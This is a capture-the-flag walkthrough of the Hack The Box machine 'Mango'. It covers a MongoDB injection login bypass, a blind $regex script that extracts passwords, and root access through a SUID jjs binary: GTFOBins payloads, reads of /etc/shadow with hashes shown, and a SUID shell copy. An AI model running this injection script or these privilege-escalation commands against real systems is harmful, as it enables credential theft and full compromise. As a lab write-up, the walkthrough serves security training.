IP: 10.129.1.219
I started with an nmap scan:
┌──(kali㉿kali)-[~/htb/mango]
└─$ nmap -sC -sV 10.129.1.219 -oN mango_initial.nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-06 05:24 IST
Nmap scan report for 10.129.1.219
Host is up (0.41s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a88fd96fa6e4ee56e3ef54546d560cf5 (RSA)
|   256 6a1cba891eb0572ffe63e1617289b4cf (ECDSA)
|_  256 9070fb6f38aedc3b0b316864b04e7dc9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Mango | Search Base
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.96 seconds
Three ports are open. Port 80 only returns 403, while the TLS certificate on 443 leaks a second hostname, staging-order.mango.htb.
I added mango.htb and staging-order.mango.htb to /etc/hosts.
Opening mango.htb over HTTPS shows the "Mango | Search Base" page; opening staging-order.mango.htb over plain HTTP shows a login page.
On that login page, submitting admin'-- as the username with an arbitrary password returns neither a result nor an error. A SQL backend would usually complain about the broken quote, so this is more likely PHP talking to MongoDB.
PHP parses a parameter written as username[$ne]=x into an array, and the MongoDB driver passes that array through unchanged, so the key becomes a query operator ($ne, $eq, $regex and so on). Sending username[$ne]=x&password[$ne]=x therefore turns the login query into "username is not x and password is not x", which matches every user.
The response is a 302 redirect, so the injection works.
Following the redirect to the home page, however, only shows an error.
The blind injection is working, but the page itself errors out, so we still need real credentials.
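To make the mechanism above concrete, here is an added example (not code from the original post or from the target application) that reproduces the PHP-style parsing of bracketed parameters into nested arrays, evaluates the resulting MongoDB query document against a constructed, hypothetical user collection, and contrasts the vulnerable login with a hardened one that refuses anything other than plain strings. The user records, field names and function names are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample collection standing in for the application's users
# collection; the names and passwords are hypothetical, not the box's data.
USERS = [
    {"username": "admin", "password": "Sup3rS3cret!"},
    {"username": "mango", "password": "hunter22"},
]


def parse_php_query(body):
    """Mimic how PHP turns name[key]=value into a nested array.

    username[$ne]=x becomes {"username": {"$ne": "x"}}; a backend that copies
    that value straight into a query document hands MongoDB an operator
    instead of a string.
    """
    params = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)\[([^\[\]]*)\]", key)
        if m:
            params.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            params[key] = value
    return params


def matches(doc, query):
    """Tiny evaluator for the subset of MongoDB operators the attack relies on."""
    for field, cond in query.items():
        value = doc.get(field)
        if not isinstance(cond, dict):
            if value != cond:          # plain string: literal comparison
                return False
            continue
        for op, arg in cond.items():
            if op == "$eq":
                ok = value == arg
            elif op == "$ne":
                ok = value != arg
            elif op == "$regex":
                ok = isinstance(value, str) and re.search(arg, value) is not None
            else:
                raise ValueError("unsupported operator " + op)
            if not ok:
                return False
    return True


def find_one(query):
    return next((u for u in USERS if matches(u, query)), None)


def login_vulnerable(body):
    """What the PHP backend appears to do: forward request values verbatim."""
    p = parse_php_query(body)
    return find_one({"username": p.get("username"), "password": p.get("password")})


def login_hardened(body):
    """Reject non-string input before it can become a query operator."""
    p = parse_php_query(body)
    user, pw = p.get("username"), p.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        raise ValueError("username and password must be plain strings")
    return find_one({"username": {"$eq": user}, "password": {"$eq": pw}})
```

login_vulnerable("username[$ne]=x&password[$ne]=x&login=login") returns the first user, and a body like username=admin&password[$regex]=^S.* lets an attacker test one prefix at a time, which is exactly the oracle the extraction script below depends on. The hardened version raises before the query is built; in PHP the equivalent check is is_string() on each field, or casting with (string) before use.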
From HackTricks I took a blind-extraction script for MongoDB logins. It uses the $regex operator and the 302-versus-200 difference as an oracle to recover usernames and then passwords one character at a time:
import requests
import string

url = "http://staging-order.mango.htb"
headers = {"Host": "staging-order.mango.htb"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}

# Candidate characters; punctuation and whitespace are backslash-escaped so they
# are matched literally inside the $regex pattern.
possible_chars = list(string.ascii_letters) + list(string.digits) + \
    ["\\" + c for c in string.punctuation + string.whitespace]


def get_password(username):
    print("Extracting password of " + username)
    params = {"username": username, "password[$regex]": "", "login": "login"}
    password = "^"
    while True:
        for c in possible_chars:
            params["password[$regex]"] = password + c + ".*"
            pr = requests.post(url, data=params, headers=headers, cookies=cookies,
                               verify=False, allow_redirects=False)
            if int(pr.status_code) == 302:      # 302 means the prefix matched
                password += c
                break
            if c == possible_chars[-1]:         # no character extends the prefix: done
                print("Found password " + password[1:].replace("\\", "") +
                      " for username " + username)
                return password[1:].replace("\\", "")


def get_usernames():
    usernames = []
    params = {"username[$regex]": "", "password[$regex]": ".*", "login": "login"}
    for c in possible_chars:
        username = "^" + c
        params["username[$regex]"] = username + ".*"
        pr = requests.post(url, data=params, headers=headers, cookies=cookies,
                           verify=False, allow_redirects=False)
        if int(pr.status_code) == 302:
            print("Found username starting with " + c)
            # Greedy: follows the first matching extension, so two usernames
            # sharing a first character would only yield one of them.
            while True:
                extended = False
                for c2 in possible_chars:
                    params["username[$regex]"] = username + c2 + ".*"
                    pr = requests.post(url, data=params, headers=headers, cookies=cookies,
                                       verify=False, allow_redirects=False)
                    if int(pr.status_code) == 302:
                        username += c2
                        print(username)
                        extended = True
                        break
                if not extended:
                    print("Found username: " + username[1:])
                    usernames.append(username[1:])
                    break
    return usernames


for u in get_usernames():
    get_password(u)
Running it recovered two usernames and their passwords:
┌──(kali㉿kali)-[~/htb/mango]
└─$ python3 mongo_brute.py
Found username starting with a
^ad
^adm
^admi
^admin
Found username: admin
Found username starting with m
^ma
^man
^mang
^mango
Found username: mango
Extracting password of admin
Found password t9KcS3>!0B#2 for username admin
Extracting password of mango
Found password h3mXK8RhU~f{]f5H for username mango
I can log in over SSH as mango with the extracted password.
But I can't read the user flag, since it is owned by admin with mode 0400:
mango@mango:/home/admin$ ls -la
total 24
drwxr-xr-x 2 admin admin 4096 Sep 30  2019 .
drwxr-xr-x 4 root  root  4096 Sep 27  2019 ..
lrwxrwxrwx 1 admin admin    9 Sep 27  2019 .bash_history -> /dev/null
-rw-r--r-- 1 admin admin  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 admin admin 3771 Apr  4  2018 .bashrc
-rw-r--r-- 1 admin admin  807 Apr  4  2018 .profile
-r-------- 1 admin admin   33 Oct  9 13:17 user.txt
mango@mango:/home/admin$ cat user.txt
cat: user.txt: Permission denied
Switching to admin with su and the password extracted from the database gives access to the user flag:
mango@mango:/home/admin$ su admin
Password:
$ id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ cat user.txt
c1db8b2dc68a1dbe1bbd65be8f557e7c
$
Privilege escalation:
sudo -l reports nothing for admin.
Next, a check for SUID binaries:
find / -type f -perm -04000 -ls 2>/dev/null
786500 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
786527 44 -rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount
786585 28 -rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount
786567 44 -rwsr-xr-x 1 root root 44664 Jan 25 2018 /bin/su
786551 64 -rwsr-xr-x 1 root root 64424 Mar 9 2017 /bin/ping
66 40 -rwsr-xr-x 1 root root 40152 May 15 2019 /snap/core/7713/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/7713/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/7713/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/7713/bin/su
116 27 -rwsr-xr-x 1 root root 27608 May 15 2019 /snap/core/7713/bin/umount
2657 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/7713/usr/bin/chfn
2659 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/7713/usr/bin/chsh
2735 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/7713/usr/bin/gpasswd
2827 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/7713/usr/bin/newgrp
2840 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/7713/usr/bin/passwd
2950 134 -rwsr-xr-x 1 root root 136808 Jun 10 2019 /snap/core/7713/usr/bin/sudo
3049 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3419 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/7713/usr/lib/openssh/ssh-keysign
6452 105 -rwsr-sr-x 1 root root 106696 Aug 30 2019 /snap/core/7713/usr/lib/snapd/snap-confine
7626 386 -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/7713/usr/sbin/pppd
66 40 -rwsr-xr-x 1 root root 40152 May 16 2018 /snap/core/6350/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/6350/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/6350/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 May 17 2017 /snap/core/6350/bin/su
116 27 -rwsr-xr-x 1 root root 27608 May 16 2018 /snap/core/6350/bin/umount
2658 71 -rwsr-xr-x 1 root root 71824 May 17 2017 /snap/core/6350/usr/bin/chfn
2660 40 -rwsr-xr-x 1 root root 40432 May 17 2017 /snap/core/6350/usr/bin/chsh
2735 74 -rwsr-xr-x 1 root root 75304 May 17 2017 /snap/core/6350/usr/bin/gpasswd
2827 39 -rwsr-xr-x 1 root root 39904 May 17 2017 /snap/core/6350/usr/bin/newgrp
2840 53 -rwsr-xr-x 1 root root 54256 May 17 2017 /snap/core/6350/usr/bin/passwd
2950 134 -rwsr-xr-x 1 root root 136808 Jul 4 2017 /snap/core/6350/usr/bin/sudo
3049 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jan 12 2017 /snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3419 419 -rwsr-xr-x 1 root root 428240 Nov 5 2018 /snap/core/6350/usr/lib/openssh/ssh-keysign
6445 97 -rwsr-sr-x 1 root root 98472 Jan 29 2019 /snap/core/6350/usr/lib/snapd/snap-confine
7615 386 -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/6350/usr/sbin/pppd
263053 40 -rwsr-xr-x 1 root root 37136 Jan 25 2018 /usr/bin/newuidmap
263052 40 -rwsr-xr-x 1 root root 40344 Jan 25 2018 /usr/bin/newgrp
262942 76 -rwsr-xr-x 1 root root 75824 Jan 25 2018 /usr/bin/gpasswd
263069 60 -rwsr-xr-x 1 root root 59640 Jan 25 2018 /usr/bin/passwd
263051 40 -rwsr-xr-x 1 root root 37136 Jan 25 2018 /usr/bin/newgidmap
263140 20 -rwsr-sr-x 1 root root 18161 Jul 15 2016 /usr/bin/run-mailcap
262848 76 -rwsr-xr-x 1 root root 76496 Jan 25 2018 /usr/bin/chfn
262850 44 -rwsr-xr-x 1 root root 44528 Jan 25 2018 /usr/bin/chsh
263194 148 -rwsr-xr-x 1 root root 149080 Jan 18 2018 /usr/bin/sudo
262797 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
263230 20 -rwsr-xr-x 1 root root 18448 Mar 9 2017 /usr/bin/traceroute6.iputils
262806 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
268892 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
393793 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
262966 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
263423 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
274666 12 -rwsr-sr-- 1 root admin 10352 Jul 18 2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
274590 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
266298 100 -rwsr-sr-x 1 root root 101240 Mar 15 2019 /usr/lib/snapd/snap-confine
Many binaries are SUID, but jjs stands out. Its mode is -rwsr-sr-- with owner root and group admin: SUID and SGID root, executable only by members of the admin group (which we now are), and it is a JavaScript interpreter that does not drop the elevated privileges.
GTFOBins lists this one-liner for a SUID jjs:
echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
Running it changes the prompt, but I cannot type any command into the resulting shell.
echo 'var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/root/root.txt")); while ((line = br.readLine()) != null) { print(line); }' | jjs
With this I can read /root/root.txt and grab the root flag:
$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs> while ((line = br.readLine()) != null) { print(line); }
73f83e96420e914ddbe0f81a4230666f
jjs>
The same approach reads /etc/shadow:
echo 'var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/etc/shadow")); while ((line = br.readLine()) != null) { print(line); }' | jjs
and returns its contents:
$ echo 'var BufferedReader = Java.type("java.io.BufferedReader"); var FileReader = Java.type("java.io.FileReader"); var br = new BufferedReader(new FileReader("/etc/shadow")); while ((line = br.readLine()) != null) { print(line); }' | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/etc/shadow"));
jjs> while ((line = br.readLine()) != null) { print(line); }
root:$6$6uG5902N$XonoH4wyYV2f8.7fEVXLe03mLoH3r1lnJ59s2jTWTAV.qZKZH.CXYjCWuUG5gLnioLpSTBA3F1LXqQAOqdAJN/:18166:0:99999:7:::
daemon:*:17941:0:99999:7:::
bin:*:17941:0:99999:7:::
sys:*:17941:0:99999:7:::
sync:*:17941:0:99999:7:::
games:*:17941:0:99999:7:::
man:*:17941:0:99999:7:::
lp:*:17941:0:99999:7:::
mail:*:17941:0:99999:7:::
news:*:17941:0:99999:7:::
uucp:*:17941:0:99999:7:::
proxy:*:17941:0:99999:7:::
www-data:*:17941:0:99999:7:::
backup:*:17941:0:99999:7:::
list:*:17941:0:99999:7:::
irc:*:17941:0:99999:7:::
gnats:*:17941:0:99999:7:::
nobody:*:17941:0:99999:7:::
systemd-network:*:17941:0:99999:7:::
systemd-resolve:*:17941:0:99999:7:::
syslog:*:17941:0:99999:7:::
messagebus:*:17941:0:99999:7:::
_apt:*:17941:0:99999:7:::
lxd:*:17941:0:99999:7:::
uuidd:*:17941:0:99999:7:::
dnsmasq:*:17941:0:99999:7:::
landscape:*:17941:0:99999:7:::
pollinate:*:17941:0:99999:7:::
sshd:*:18166:0:99999:7:::
mango:$6$D9GOkLkh$Il/e.J35n8XniWWTWXPoXj0w.YwwVS2uAy5EHR8GoyZBoMj02sGSLXakk0nsCJS2v1SrWA6y.y2GCR3L/T5h41:18166:0:99999:7:::
admin:$6$Ls6eLFhb$XoRxrUPmgvjcZSoN1OnYWIlb7ALWvcaiK3MubdX99C08H1lWLfXDipAmqdRc6yikHUwaixBD/UnK/GhFx/tIY1:18166:0:99999:7:::
mongodb:*:18166:0:99999:7:::
john cannot crack the root hash (sha512crypt) with rockyou.txt, though:
┌──(kali㉿kali)-[~/htb/mango]
└─$ cat root_hash
root:$6$6uG5902N$XonoH4wyYV2f8.7fEVXLe03mLoH3r1lnJ59s2jTWTAV.qZKZH.CXYjCWuUG5gLnioLpSTBA3F1LXqQAOqdAJN/:18166:0:99999:7:::

┌──(kali㉿kali)-[~/htb/mango]
└─$ john -wordlist=/usr/share/wordlists/rockyou.txt root_hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:04:41 6.03% (ETA: 12:28:22) 0g/s 3496p/s 3496c/s 3496C/s computer?..collants
0g 0:00:28:37 40.46% (ETA: 12:21:24) 0g/s 3446p/s 3446c/s 3446C/s mac82571..mac12600
0g 0:00:45:45 66.20% (ETA: 12:19:47) 0g/s 3462p/s 3462c/s 3462C/s boston.com..bossstatus
0g 0:01:07:16 98.01% (ETA: 12:19:18) 0g/s 3486p/s 3486c/s 3486C/s 040019500..03wood
0g 0:01:08:37 DONE (2023-10-06 12:19) 0g/s 3483p/s 3483c/s 3483C/s !!!playboy!!!7..*7¡Vamos!
Session completed.

┌──(kali㉿kali)-[~/htb/mango]
└─$ john --show root.hash
stat: root.hash: No such file or directory

┌──(kali㉿kali)-[~/htb/mango]
└─$ john --show root_hash
0 password hashes cracked, 1 left
Rather than cracking, we can have jjs, which runs as root, copy /bin/sh to /tmp. First check that the copy succeeds:
Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').waitFor()
jjs> Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').waitFor()
0
waitFor() returns the exit status of the process, so 0 means the copy succeeded.
Checking the result:
jjs> exit()
$ ls -la /tmp/sh
-rwxr-xr-x 1 root admin 121432 Oct 10 03:08 /tmp/sh
The copy is owned by root (group admin) but has no SUID bit, so running it would give nothing.
Set the SUID bit on it from jjs:
Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /tmp/sh').waitFor()
output
jjs> Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /tmp/sh').waitFor()
0
Now the copy is SUID root. Running it with -p tells sh not to drop the effective uid:
jjs> exit()
$ ls -la /tmp/sh
-rwsr-xr-x 1 root admin 121432 Oct 10 03:08 /tmp/sh
$ /tmp/sh -p
# id
uid=4000000000(admin) gid=1001(admin) euid=0(root) groups=1001(admin)
We can now grab the root flag.
# cat /root/root.txt
73f83e96420e914ddbe0f81a4230666f